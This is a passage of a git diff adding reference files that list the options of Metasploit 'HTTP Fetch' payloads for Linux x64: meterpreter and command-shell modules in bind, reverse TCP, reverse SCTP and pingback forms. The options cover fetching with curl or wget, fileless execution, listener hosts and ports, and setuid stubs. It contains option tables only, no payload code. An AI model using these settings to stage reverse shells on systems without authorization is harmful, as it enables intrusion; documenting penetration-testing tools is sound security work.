no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..46baf06 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt 
@@ -0,0 +1,105 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PxArnjQCup no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c57417a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WcldDeooyHS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..6ccb1ad --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt 
@@ -0,0 +1,72 @@ + + Name: HTTP Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/http/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME caEBFkqCr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..409be8f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/http/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yQxryUKTSxWl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..f4d9dc7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt 
@@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JBiyJSJk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false 
no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..8b4acd2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/http/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DZKWFBbuk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false 
no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..9e08905 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NhQhQUrqRBKq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the 